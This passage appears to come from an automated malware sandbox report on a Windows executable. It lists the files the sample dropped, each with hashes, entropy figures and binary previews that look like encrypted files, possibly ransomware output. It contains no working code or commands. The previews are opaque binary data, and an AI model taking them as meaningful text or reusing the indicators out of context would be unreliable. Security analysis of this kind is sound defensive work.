[.......X....\..b.fgo-...$....b.aK.|..m.....Oqa.....w.n...=.PI..n.X.I.."....]......q$...$OHwY......<.Q.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):2113
              Entropy (8bit):7.900221953227671
              Encrypted:false
              SSDEEP:48:Z9wRHCdA8NNHSnAsWpi2cZR3dKM0W1M30ui2RtOaSD:vwxCdRnyn0FcZN8V30uRtz6
              MD5:C5CACD9B85D5DFC8B2C38A4C27A7558E
              SHA1:F3B632CA6FE82884115EB89230F4384CEEC6B15F
              SHA-256:10D88C2100C64BC4B8B2F7890CC2C1F972B227E75BA4B29D09C90617E7E16176
              SHA-512:40B872AC0E8F65C3638E83C5A86364A10D4E1DEB0D4FD4D9744F0AF4E21189995F678349DC30BFE1042081C0A5008656C953D12FF2C9CCB9A3EC3073F556DA2C
              Malicious:false
              Preview:<?xml.C.#.v.....sX.B!f,;&..a.0..P.FF5!wC.W..%|!../.+#.M...c.xr.RK.O.6].6....q%...`u.t...F.........SC......&.\.!^KJ..A..../fR..G.....H..=..Zvc..e...d.3..Cx..[.,...@.R.....V....x.....+m..N..y...7...vU...Q7h.XJ.?..........y.....C:.H.C_...S.h..yp......?gA....c.@....D.m..!.'..R.......hO.l.g.".^.3.Rh{....6.....V..<wx..)...-|..V..V..b...D....E}`_..W.e.kg88.{...8.. A.$.2..Y.s.F.$.yA.Y..l.5.Km.xJ.w.......L.....4...\|.b.....}.eK.,.....:.L....c..%[..i.V.....t.$~...........m.=^..:#!....v.{$..Mv-....t<f.....!0....?.<Z".0.......{|qM....h}-.....xM..s%...W...E:....{.....$\....m.?..@\..4.'h.PM..{...oc>7..*j72.r.S.y..4...H.+N.X..*..(ye..v...@..s...c.....\._.J.._.K.Z..PG......p-.E+.r...w...-%..&........6C..T$.=.D..$......K.h......y.y8}.%./...k-..cb.M.....%E.t..@u7....W....y/tV...$.q.q&...&...U.()3........x1\..u&.W.]...U<-e.J\....XXD.......d7.........%6*f...2..X.'5.rz.=..-N.G..n]..U....q..K..3.Q........_M.)v8..B..(R.&.k....7S..{......O...t..s.W....*k*
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):813
              Entropy (8bit):7.7205995336165865
              Encrypted:false
              SSDEEP:12:PMytye6wFFeMjjNthhvpkXmnth7xyHpe/rFeTOFSdPKp3inEpMAXG7euukIcii9a:PMwbjbhhv+mnJy2rwOFSdyp3xpMAuobD
              MD5:3A9215E7C08858C2491AFEF0B47528E5
              SHA1:70268C13F70D160C3033F11500ACC0FE68D63C84
              SHA-256:6BEE319A473A54A7F09CDC21ED338E581F425F5548F756D4E4B42CB68DFEC895
              SHA-512:8D65497C68A30AFF63846191E2A33418B21C375B5F428D9D2DA4CEC6E89E6931E83E45C7576C10AD2AA176E881B116223356130FADBE20B4958E01030943CB38
              Malicious:false
              Preview:<?xml.0`....~m.v..m_.H8T5....@.....=.....{.4s.S.y&*.x..!..0}...c....h.T.Y'.........U<sX.y.Yl!..'.0_....Q].X'.$.u.6.Y;=S...f...p.~_.D8..m..v+-..J...`4..7z.H+.5.a..#.gS..uB{x.".<....NU8.*u...s.S.F.M..'.9........O:......:..#C.8f..1E.M.._...&..[1.<{...C..r...z..t.....|.v..i.A;.<...8.W|F..K..9.y..X..&b.|.S..07g...B.W.qac.....x....fC...94?.;...4..........!DHT>.u/Wrf....p...I(...r.&<.p.X...au..n.....d..2c:.e......R.B..."..T....J.j$'...4I,...!.RJ.|........i;..H..Br.pk m4.Rl..A......k.".G.5K.......~6BG.{Ny.4.c......e....- D..\....$.Bc.... ..*#.x*..2..Q..n..S.(..iMt.{$........U.!.Z..oFM.Z...J....t....9.{).kn...............XU...V.B9.&9Q.*..I........~.d..Y........Ca.ig./.8L.z..(b2K..u....K..6X......?..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):2070
              Entropy (8bit):7.9021037404934
              Encrypted:false
              SSDEEP:48:YXgbmG4+g0kQ/fTXL/POypUYgI0XOCuAixrdjWmO+KFBguNxwOh4WvD:JbT4HfgXLeyptcDuAix8mnEFiOht7
              MD5:017E19B0164DECC4D16CB7194404F737
              SHA1:99ACAA95D207626110D592492050A69ACAA2E289
              SHA-256:6B6B4B434A029CEA560A66D5F02E85B0ADA3D18A1099EABE984B558A08FD0264
              SHA-512:E24E694C8D576A8CC92CADE7B38061B337ADADA7E4E5CF61C9268699DA38687D7EE2A656A920588B3354F8E69482164DCF4B2EBD6E8BC6F3A41862D2040273AB
              Malicious:false
              Preview:<?xml.'>.|..).tm_N.^p2Jg....w...K........\..!k..6.Y+.......V.z.%@qa.........+...1.o...$..UQ..Ao.O..Q.f.............d.....[..F....m'..I.A..n.&#.........v{,).C....9.qU;....y.X.$...v...'.,1..>6Q+.B...VR..~4...-%.2".....`............?wp2g..M.c...f1O....g..,...8..s...j.N92k.U$JE <y.o....}..j'. @.p..........>.L...I#.^...h....[...x..........WA.-..I....'R....8H.7K..7CJ.....E..&..+..1"g/...5...5+...?......H.8...X.xHta....H#C..]..&./-...j......UeU.......d.......i9^..mcH.)..Y(.......*......Cb...n...B`.S)...../...............4..s.....4...r....+....)b..PC.H.3..h....p.,..~..3...-....x....%6.....8..Q....^.C...=V$.tb.v<H..P......}e5....]..6T.?5.T...(.....n....b.u.....V\.....U.`(..xQ....tb...j.f...Go...n.l(.}.e'..T.......q..^_../X..#.>6U.x...=`.......k...d.%.)...!..B..\.v.l{..U...Z.X..*...w.!.u3.N;............a.."9.G...H.X.r.d..LHI. .E.b.1.z4-.b..?....1.F)=....;.nra.1........HK3..t....?...b....S.lZ......1.r.peH;.};.P<.N2Q...OD.f..\.......D.fp
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):789
              Entropy (8bit):7.700454244558532
              Encrypted:false
              SSDEEP:24:Mk4L2NgIcOEbLu3pwzf+mlNGrqtpsvATb2BbD:Mk4LWFBOLsCXldCv+b2RD
              MD5:ED814898EC09F9E9D52239E37AB33ABB
              SHA1:A2D3CDC2A7DF8CB705ABCA8B528699C00EBDD958
              SHA-256:D9CEB4BE2D419B35D19F549D4EE11E524376602FB5CAD6F9F20E80BB56A5E798
              SHA-512:B68369B85464A55EA7DB5EEB4CCFD800F9C517650868E9ECCA60CC48C12766894B0F962A40B87A0D010C1EBF10121ABDF31883E560C83802E0B600ACA0917108
              Malicious:false
              Preview:<?xml..S@R..K..V.;...0..$...D.*p...)...v..6/..L.NT.\b=.y....i..........V^.@)^..2k...^.!.....%..X.h.f:.F.|.yx.......lc=.rE..;F.L..."@...~Z..}}...q..<.Z.w....;.J..>.O.xy?^..r...E.............2{.<..*.....(...J..y$.f....!...._..#,(&.iE.yb:...LB.}m7..q...Oo...t.&..==..f...E.*...v.l.2k..N.f-`.].#....[~,d.GF...A...4.?.K...!.h......B....}].[.:.....2.`3..*.....l...h.-...._.8.;T.L..L(...&.........<]3..V.U.`!y...._..j7..6..,.~.F@$.oJ..:G..P.....d2.2=G..G.I./..l........J....:1DX.ZQH...a...u.=...oI.y..4.6..F.h.u~Z......6V.h..)}.Kh....kXT.......L.?.2..k.I...D.R.uE..ciw.$..m8Jq.....8iY1.7.....<..{8..l.m.Q..9.@.D..gFRF9$8$.a.a2l."v...5.?\......=...^U.5#8...V?.N.\B..}|..*e|B.W.'...lR.Q.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):3017
              Entropy (8bit):7.938395468175315
              Encrypted:false
              SSDEEP:48:TLcAIkMV6inpv1zvXBdQYD3s+8C33XLpn5rWZy0gPhhiTGOzXfy2DEO5Im5Nr2A4:TgVB5vXnDvLphgy0keThzXfyAmm5NZuL
              MD5:2ADA0E8D64AC003533C9ECDBAF0C2667
              SHA1:9B245C3C3DA0E8D92D57CB5C62333D96630522A6
              SHA-256:CE5304C8E606794FEBF223856F314736F8193C737F94E9FA7F8548825A590E95
              SHA-512:9571325B150383050727E29447502DDE17D6B6951369A8C716DA0B1076543A9546FB6AB7FE444335C76024FE2571EE933F3598E57614D5BD92BE8B6AD33357A1
              Malicious:false
              Preview:<?xml>..E[./....r.'...>v|.%x.,6.(C.0..w.]..D]. ...o...!0{.....|..`q.-..V..E..PLp.w9....ys/....R.~.....{.......z....|....E...a.Q..c.....M..I.4)+S..m<=.q.h?IZ....CJD.r...mIi..l...3..^....L.r.;....;kFa.3G.!.c.b.v..o.`.....4....NgB...=[.q.MS(...Qv.s......8.s.......w....2 74.U....%..[.7;...+.[r-.w......._..:...`._.H.=^......@.D@C...4.xz.....}......)....^......q.....'C...o.=.ix.eO..x....8C....2....').;.........Le...f...v.B.3j.,/.(.}.$.e.m..c1..`.. i.HuJ.......Y....O=.@0v..eM.L....a...&..k .s.3..e......WN.ZX.w...dp.....8A.x.....B.8(.S......u....B. .1Q.c.^,T...Y...+L....x.8.l........&?.].]....c...z..-<s......M.b.Z.X=^..w..H*O..w..:.*N`....d..A..\C....Z...$...|L.j..#.X.0w..L..u$..........uX. .AZ..".....P.Jl....%....Rj..C....\.....]....sIx..h.|.c..|J4..C.WKx;s....Kr.C.c.....B....?.{}._..;P(.+.....1..."xa.l}T..{O..T.%...B+.F......6.G~`0.n.....v4.S....Q..yI....v.Q..Z.zm#lc.s..Q.&.4....<.n._k/..w..YRNR..O.&H.^.b.~..;...K.DZ.kc>.w....>.l.+.A..w..}....}......
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):3017
              Entropy (8bit):7.938496536552607
              Encrypted:false
              SSDEEP:48:J+5bRpOg+2beGf6kKx2vf3SvpJJqDYnY0E1ViFMWcZ4ndrOLdr4/34UERD:J+tfOqhHPH3ipvqcnY5ViFMWhOBrUs
              MD5:C2C48519BC81DEC02BECAB57F703349B
              SHA1:1D315864D74D92AC6702AA228447FECC1550D5A0
              SHA-256:58F8619733B6E6D6B1D1C86EBD395B23F0E6DC60306D624F5675C9AD87AA9ED2
              SHA-512:68D7A5B5B9D83F1B297AE43C1AB59C56AD8A86CB0B1242F0E55382EE12E0F575A84B71CB691BFCB4DAAE42EE8FA558D1659CF973F9CD334B94902D8E9184C225
              Malicious:false
              Preview:<?xml.Co....L{f..(....._..-j.....>A[.@...y.....X...........`....J....nR.1....*......H~.^.Id9..j.Aon,.!#.......Z.aY:....+ 6N.J.=........V.....A4..K..!.:.../.C..Un?.v....<..v.d..".g....~7j$.u.........%....).5..I.D..~I...&...`E.fFL+..8..[.A..L.n...s.8'wO.;...........,W?..B~H.....6.h......WX...L9?D..8.s..#.E..0A.Y.(.iX.._...|...B..{8G...7.-ck..)..y!T....6Q.w...[...aL.....8.....n..=.`vK53.,..e..3.|.......c...@K...(..U......E.d=ja$..j.g]...G..j..T.../$.\.2Q...../.h.^.r..r(N".6w...U.J.....Z|\..J.X5^..C.......?>o.Q.r....,.(yC.,9...&].1&.`.e...#...U......8$?...b.C......1...v.!.F.u.,..yq..k.h..=..l..s....K,._......,8.Z..M..k}.....g^.y,.....p._e.W...W7..'Di/.kR..B^.?..sQnAX..q..K.]u[..u/.f.E:.I..."..@U^........".]...Fs.C.....J.K...\.e.\.B.Q"0.*.i...+h.M...#.+.^.`t..L].S.V.GV.0.e..h.<...-s.j3.w .gH......}QpF.i...9.M+(....../.d..;\..(...^2......Yj0%D7.{6k.|EC._h..(.\...."yi, .M..c.W..{if..HWhi.....}....%hk...u. ../.....a..!A.O.4.\.p..6M.,..............h
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):4639
              Entropy (8bit):7.955534675911327
              Encrypted:false
              SSDEEP:96:Bp67r6cu9gmOMm7uVIEEXR4GIzbkE+3hclTeXu+lx0d:Xw0emO9cIEEhkbLeYTee+Q
              MD5:941F8A7705225CF68A070E113DA9A289
              SHA1:1B7E448EE41479B5F88924EF61742F3801F5D5FE
              SHA-256:FB389137E0EE6F7F12C287627FF5F9AE0E08569C6BB69DEB9F4E15B6D74A8B8F
              SHA-512:41B2A763F5E4134A46E97A9F017B9F2E4D4663926216C750B53DA24147DCB7712297D25E95029B8B5880C393D9B5890559AC2D9209EE7F887B1A35FE8AE1D56B
              Malicious:false
              Preview:<?xml......?..\.......gN69.o..gu,.u[..]... ....s.~Y.t.^.O..l....%S.).........C.t-.=B..2...]s-......hP.7.;1E..=...m[A.ek.:/s.4K..{....'..n..\..........8...uN..{.'.m..eY.(..n..m..<H.H..7..G.....]0.YJ.o..|....b..xh...C...xf.8s[.O.B.....8o.7d..e.9.LW..g.v....<\....BD.9.c9;N.o.`}^...x.Fs.*.w]....>..E."...W#....].VM,a.{.|..81.)....GP.*.n.j..h].wh.'...1..j..7=.A..9l..P...&....U..... ...?.M..1.*-....:f....F..4.d....E$.}.......K.2.G.s5.........Q...^bx6..#O.[.".........1.(.....m./..h.U.Iywb.;....I.....$.s.S..W....I....t......^.,.C..JM.~:.g.j...c7..Ex0...d...o.. ag.M...K.Q..j...a..n...Zje..T...L..........j...X..r..rm.....%H..)..f..(....>..b_J@..9..........V..1....)...4m.Z.....s..y.......X.l...sv;.<.y..N.....ZS........|2;;l.`..?....t....B,G...6~$G>;Z0...y_/.Q..(}.#s..&..p...-{|.ll..V..jt.].........x...co)........d..G.A.p..EiN>.m......)...0V...R.i...5D.t.%..v..S...Jv.w|:.(.wz4...;L.X.......*..R....7..G....&."u'+.;....q=.H_++...9i.u.O..q&[..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1329
              Entropy (8bit):7.84974650475873
              Encrypted:false
              SSDEEP:24:o5DTzJJbKpLRBkh+qOYTp5Kvnfmh/JbK7e6Yvl69AWMURbIaRyrinlbD:o96VkLS3mjGSZt69AWV7Rdn1D
              MD5:16F2027CE38A5521995208A9DEF70007
              SHA1:C46CCBAD56F865085D6D349D09C96642BFE2CB86
              SHA-256:BD8A0317DD36B6E26F909E0ADB7E15A14FF8E73DFC5F63730AEB5A7EDE9B8E69
              SHA-512:6D6443B3BAEB16533704C1A8029D9F0F10903E5B079F8AAD0240A2F17B0055BC2D089E0E5B428C37AC1144A2CF73007DD5788D5750A1118B637B1FFE1C7BD890
              Malicious:false
              Preview:<?xmly.#.J.{..:./b`..3......:Qj.."..I...:^J\j..n.......D.M..U..^....U.'z..>.fTE1I.=....F%>...T...b..V..V....Y`...2.h_.d.......cD...P`.....}a.....r.kh.....:}t.._.....e.:hr.."..%....?...._Z]\$H.G...O....7v.;.1..r4...0...).G.....U...0..QMroC*\M..\2.._*P.$..x...|....C.v>..&Rf.....93.=.9.1&..!....H{:.4...Ic ..AI.s:.....H.E...t.5......~L.>..W..Wv-..D...<...'.(.J..<..R..iE`.Q.p........GuT.J.t.....#.jX..y..........#.2....Lc..<.....}.F...B.....P<Y/...iJ.wP......i.jDbA.n...E.....6.Z~..6.Eh.46.^.R..../W.h....)..;i.}...h..B..T.;.I....9.is.K.!...#..Va.E.y+G...Z.I`R....j...r'.....s.e&8A.....z....&.0...[..(.,A .3....%..N.a.....T.......j.g..IW..........~.;..]Pl.g(.q. .>.Ik.K..\......z...Q\..E.ePfZ....,5z.2.Zz......I,..({.;c.<b....V.B.`W.l.....+.^.[.8.K..W.5whs/h....s.B..f....v...l.OO.U.9.C9......O.......oF...I.Q%..e28..yv.9?..?.......K'..0.,}F..0y..UC..I.9!j......l}c?;aJp^.4...X..B.Y-.......6l..-....E.:..4...S..q.d.#...:.(r..b..W|.6.......<.9..."...2...D..t.".k.X.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1395
              Entropy (8bit):7.833838447558547
              Encrypted:false
              SSDEEP:24:4tgmMlPg7XwC+yowVqlrfizFeGe7jv38f4DCdtGc3BHRZd8NJBeWPbM2X0JbD:2o9g7AS8lziRcnQ73rZgWWPbED
              MD5:B10B3F4E4E34B37884A25031549563F0
              SHA1:5B69C6B9B4B1661617054BB6BC64298F7D6BB735
              SHA-256:58448213EAD1534CFE6BB3FBA7AC0592DA4C7F1D22387FC0A040EDB5D23EE135
              SHA-512:B84DCDCAB3C600F1262DE14FED31FE10D47D65F4E73EC84290610FE881C2C34E9AEF25E5765CC15462729AF5ABC03DBD8A1A4E44695602218E1F657280D9F8F1
              Malicious:false
              Preview:<?xml..y....aW...J.a.).p.+e.j.....d..mb6.a..'<if..CIs9.3..n.5$.F.......yu.....Q}...?..........-~.=..d..K..=H[.}\.......'...z....4v.m..B..%..*w.x...DI............f<t.9|....J...'.8A$d.$.Q..M..LE.t.c..o.....O...Z.S.U./...m.G....E.....\..h....2'd./..I.wXo.....+D....u..$..7.p...A.......\.Y.......T..gF.F...........}.V.Q.Tp.k?U'@.|...E...85..o(./..E.8E-..9M...!.9.Y.;hg"...<..u..H.^....in.4.....U8.|......2-......[..mN\..s.*.4.R.'..l.K.L.V.E..^2%.W..W......3.....a...w...l.N\q..BV.....?.c....e...I3.p.K..e..CX.......urI._.....0biw#.sS..hA....Q..r.B..2K.mh.9........'.H..5q.j"....$K.3\.....<c......S.5*..e5..)KM.iV.dn..=.-..B.8D..`NV..}.p .|)...Pk^6...Y._!!i6/3.'Y.w.{.....j......P..@L8iW]...H`.....".Du.9....U..9..t.!bt.......d.....f+.h.7.-....+..V...J.RTU10k)w...S&k+3.r.Ju.l..C.]..8..Eq.(..L...eG....<+C..._..qH..|...E....3,s.n..........Q..'.3.lCP...C.Y'mv[0K5`..S..Ho.B.... ...f.....a.v..K'...GD.JdZ9.D"..d(........b*..eD..gq.+\.FJ5...f....F9.....!..Z
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1124
              Entropy (8bit):7.800095041242588
              Encrypted:false
              SSDEEP:24:0wkO8OmGQDVXvX4NLVixvfSUrHolCk7vH5v78puLZl3BbD:0ROkpf49VAiUBkDHZYg7hD
              MD5:43F1DC88A7E40821475B92951FE65AD8
              SHA1:8FB62B151AA81BE31388EBD34409E3B1FE9DBC8D
              SHA-256:A764002614834A98446DB0C99B6531F30F638C19B5615A1917E463B2DC8D97AA
              SHA-512:AE268FEC5935DA01555F56DC055FE464815E8F3B13D5EAD557B367186F6E8CD9E189140B22643EBC246409E212AF758D8D15E1F276CC7D9DA6AA972986C8BAC3
              Malicious:false
              Preview:<?xml.g..>....S......5.....T..I.p.RY(....../4..y.L..S..L.Ys..R..1.oy......u...P,?..b..T..e....0..Ep..h.&..-y{(.p.B6c*..}Ya2))...a.CvNr..8....W3nTO.Y..P\.2..sv....7gz.?j%...0tn...\.W.Z..#...^z...v....sx.3..s^_o.*N<..x.i..M.\.....2.H...%q....P.z.f>..n...H...v..0>.?4.|+..1./...G..L......WJ....K:q..bQ.T...}.(8.F1M..i..Kt.f....X...!..#....Y;h...x.q.Z..6.KfYYmK.A.C......G....A.hH~1.a..?o@...&y.s..d....5)........&...........t?.#.:.....:by..#V..[.....{........G'CHd...K6Xm_.r.2......P....@.Z......w16/.. ./.....s.. .P).R...f..N\.L.....I.G......y..#........<W..0w/J..>:...?.....X47.).N../N...h.Oe..W..?.a..hmZoqY..d.M.H...^.K0.Pb.^..M. ...?c...1..g.8.....N.@.V.`.Z.!..........\p..?.].A~`.%y.\.u.Y....R..L...j..)z..5.S11.>7D%.?.....o..=...S^.0(.g.#AC1.QE..:........=7>rDe...'2...y....R...../..7..5-.}.h..*iJ..b...../..<aM.[P.....S.$L...\.ZA+..t*.V/.?.Ij....S...k&a.9&.X.B)J.!.L...^....s...58..Ht..(.b..]-6..)...).j.*H\.lnwN$.L!....z$.g.d......)eN...=v.Mv.%..k..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):8769
              Entropy (8bit):7.9787271896129335
              Encrypted:false
              SSDEEP:192:unXwdgYdIooxnNxS7CT1kWC/lsPp8AvwejtUAfkiJP0:uXw6YdIoOnNlTd2le8B1AT0
              MD5:757682F8C6A789CF929E20BF92F7E963
              SHA1:2F6CA2F548E7B7A3727E2717D3CC0A45596150B5
              SHA-256:EFB22E37BD544F523F7282CE4CEAFE517E8D957695C3590E0859183252B39C82
              SHA-512:7760203EC5706A8C1B4FECEB9A3C97AC3CF6C7B8AEB22DC1AC7B47F5E8B25DC5AF598C28D3A74A2F56BB51CC1255311BB72038B2CFBC3225805CC7A65E9B3830
              Malicious:false
              Preview:<?xml..B1,.P8l..'.`..Y..:.o...qgt%...4.>......E.......1.:....P...9}..a.>...6._....<.P..~...u.6..h#2.F..t..R.E...x.Fe...3.......G-.aJ.qiF.A.cqI-."..BX.{.>..+R.H.(.I.4t.....z.F..O.n1...H.5.OiP.i.....L..o.]U...Ch9...a..Y2..@........AL5.m;G7....Y...'.....'.:...Wl.n....co...[.J..P.`-.Z...'..C.=e....}C"...3.............7.bG;.?.....6.P..PD.p...n...F../.D...;M...q.Om....c=.....f...j.q.m.......4....iNP..e.j.y..__?.%5...3..^....wP....=...Z...:AN..6......}>.,..O.1....1.k..#..M.l......U.U.\:(...|.IdD.Z..f.h....].,..C).;..(s..c...4...2......h....T.k..x.d.I..I...h5E4.$i.....s..z*P...R.. w.....i.X.)o...T,-.j......M.Q..V..M.b...C%..x...j....0...a..*s.A.Z._....;.V...Q.'.........%.o..h.'.2.W..!..DY..B>..z.yg..*..:.\er.~.<....'R<....K.B.........`g..U7..Z(....s.u....*........<...%;.A.....v.G.UM.].........'....P.x.72.........ka......(.#....~z...Qr..s....[..RyV..@.?.~j....P6$h._4.w......[.>...'`.......]..se...._....#q...7/..Xs..PCYI.3....s.:...
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):5842
              Entropy (8bit):7.960195814519115
              Encrypted:false
              SSDEEP:96:bqKGYQ73AXhQqFBDLVFv5sCgPWR0jSyCvyJUNLO39/0DfsRrxN2GwcCy5rxQrx3Q:bCAW0VFHCjSDBNLerx4qCkGx3Q
              MD5:42D4203CC833014E1F49E768CA8E6BB0
              SHA1:6AA9F6D2A334F6A8CB693C21EA1264EFA66B3153
              SHA-256:5C23C5BC8B3B53E57A62AED76C396D8EADD9EA81FE1B4784314B6E05301D6987
              SHA-512:31C1B6186FFBC3AB671355D5495B66507D7F98E64ACB61758D7210CC90AD643277EB03300952DBBDCED33963DCCCFB9271BD9617811D1BB4CC1ED30DB30CA9D7
              Malicious:false
              Preview:<?xmlBTeX.Im...;...h...%...`O.i.3..6.. Z.).-...PfC..w.....m2......$E|...{........Y.S.@..3.h-..t...c*.i......C.k.E..^..&..b+Y:.V..,..Ii.T.5P%....p.....v....d.El"c.:...Z...^.....z..f..e+...c$...B%..^.....H.{.0.~T.c.66..........P.2.ZB......~Q.....kv.3..VU..v....Q/.J..i.z<F]-......n..@/.n.K.....R...!.'.0..B..p .~&.....W3..H..:.Jl.z....Iu.k.Y..)b.[Uj...E..{.7.Q.F.h.......;`.&.W.d....*.$y9T...l..`.>/...|,e..J........Vw .:"Q&.,t..TV..0..gY........^.j4..4..Dx.i..t.&..>.*...R-7[\.d.....S.'^.I...b......[....JI:. ".>.h..K.;2^.J...(V...9.>.B.%LKd...N..s..N...(..V..x...F.[.........[=l..-..NYL.c-X.=%[..........P.\...a.>..^Qm..L..f.J..VM.0l.N....= .....K....N...\..."..6.....2..7.7...7.W..<....*.wI..t.2....V.....j$...T.U.k+..g.%...D...\r...T..%. $f..rD.n...^.....-.6|.....Wq.cs..E8..BN...@...F)giO?..'(].-W.G'.....F.a6{.v....*..Tas........rp..*.'4DvNd...n.2..%.8T.e."...A....*.a8..C^...)_.9...#'%....T.ci..H....sQ..C-.*...F....2.........@.....$...D\........>T ^.M..}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):4787
              Entropy (8bit):7.9619683622111825
              Encrypted:false
              SSDEEP:96:6N4sSnBv/vcAi+/2gmVw3W7CdRZXMoGs2XEipwjpIp5sgJuDiwgl:6N4jnh/tNOgWiRZXVv20iuEA4l
              MD5:62AC039196D383525F980BC5CFF3D894
              SHA1:0BE38273094EA5139A137FB54DFEC63BCAF4AEB6
              SHA-256:8A091CEF2AA871A93D7527E1B2E048C7737E58FD5ABECBE1AD7FB255E19A7317
              SHA-512:F5EF2C271A14857EC211DC7FA5CFC8B499A418453A290CA8177F77810E8B8AA1167A7311D45D2931E75140AC15593664CC9DF6AAACD7F55CDF6A2EDBA0DB6272
              Malicious:false
              Preview:<?xmlH.....Y*..y.j...P...Wb..$j....s.....=.!&....++9....W....f...\^...fN.5..d.nq.G...8.]...K..w3C...:......I...[:.0....<....r3.....a.2....fF......'...G..s....|(.$..&.^.......K..*;..{....Z..V.5..l.x.=F..k..M.......'.<.`.'.>.o..x.#<...q....C..........O..7.Xp..........>......HH%.To.B.h...0 #.F.8......d ..U..#h.`_..1....xK.2._R.]..i...........U. ZT%"...N.E...b.%QP.s2U..,>...e....k.Nb..\.F*`.{.^....K...rndY.?-)...2\.O.6~rm.r........h..k>.h..A.F..-....7.O...l?M.yTb(Q.u>..-\.a)h..V&.G...S.....Dw..T....~....-$"!.R.V.l.8...b_..5+K.l...O.x..`....S.....*..Zdnv...[........6d"..2.;...d..k...L.S ...+.H..d{.....D....P{.#S.V....V.B.\.Me,....;..c:...[.v..Jn...........2%z5..@.iB.6*..*v..%.......[.X..m"~u...L...1.t.g..W.`m..Os.t..l.>.O....jq..<.C..0.Z....R.'.s@G_).....az....L.3$\.w.d=.?....q...nE.a...!6h..e.._..j..q.Z%..\. R/s....O6<IQ.<9..!......i#=.%....F8.8<?C.z... X@.....6.[?Q.lv....~....Z+..c.l.@..`c.dm.ytpG...6^g.{.r...p.(.Z...L.g..........b....s...
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):4786
              Entropy (8bit):7.957230048979114
              Encrypted:false
              SSDEEP:96:vYajZWOLDVn+ZpVZf9kf8/jgokkeDh9UF+VPNR8XRPlKi4H:vYKZbDqVZ9kf8/8Ue9kCPnQsXH
              MD5:398EA3CFD41A601483C45044181D29BF
              SHA1:B20E84218E058A9E1C456EC95B92E5723D4EFF39
              SHA-256:51A106D62A48BF3050F907AB5BC70E4BD62EA08FB427E8341167C50F166D80F1
              SHA-512:8F2166802A4034994DCF4BE8080E4B75AFABBF040CEDC83A2DBBDC2C01D65356C91719F4A0B281109DE30F7C8AB8C88053A1C4650D69E1173844A5BDDCD7704B
              Malicious:false
              Preview:<?xml?.;IT.?:.Xv...-2.....u..p..O.QCH.........E..lh.!T..v.1F5}Q$..;.....[.Y....'>..p..'5..M......rn[..L..ZH..".'+..;.T.D.o......,..K.5..C>n.....I. ......T.go..R.}....&...l..}......S..y..K0....]$.1.34{.Xn...qS/....'....+*."...Y.8..).A...-raJb...S....1...]2C...i.P.?J"..\}..._...{.#w...1.b.P....}...c....U.N..*'k..E.ci....3'y./J...1a.ar.l.^.aj..L..{1...IR}...W./9.|4a.)R...e......=`;.....-.f....g|...`....:.Dv.({..d".....J.t..B.....{..=.)&....r.....42.{..w..%..Z..D.5#..&.jCE.*...YL...#D..... >VJ....Ss..J.J..R.W..Ho..s..XR."....SB..\...e.C-.6o....;.8Y9...D...M..I....Yu....f<..........*)EP....8.`Np.A41.d.z...;.'........*.4k./...7...6B.....V2IE:.d..x..fg}`.cN..3.T.n9..arb....x.....8.5.uhnAw"<...X.....Y.n.B..U..A.......kmf.M.E....DH..b.z..k.d...{R.f.A...d..f..=:.*..H..T..o.W...J....Ci...8Tk.4..d.D0.0..^..@...).......u....../l..D.>.$.#.n.u.olk~_N.x,zf..A.b..IY.+...M3*0....c....R..5.(....`X.7.....5Q..2..Q-mM....t.y......o. i..%q.......,oj:D...b
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):3030
              Entropy (8bit):7.942348700730956
              Encrypted:false
              SSDEEP:48:5pKBwYXxRQG4hUkTxTMLydSIPjtLs/PvZ/1vN/ZrsmoLvg1yREw2t28nfD:ERXxOSuJTbS3vZ/1l/ZQd407288nL
              MD5:9F781CC435024C4438155C6634AA0AC7
              SHA1:3978FAB10F247E9260C29E6CF76A092D6F405582
              SHA-256:74BD6E52F66FF5A1E399BB068E41B1C09DE73D08F489182D2B2939CAF2D17FCF
              SHA-512:6273E5B4C2E919DC01599513C2EEFE47045236F9ED565095FB2AC49961F16EE8307FD8FE964E4DC399843152645E15F409967DFA69282931CFD5F8480053FE8B
              Malicious:false
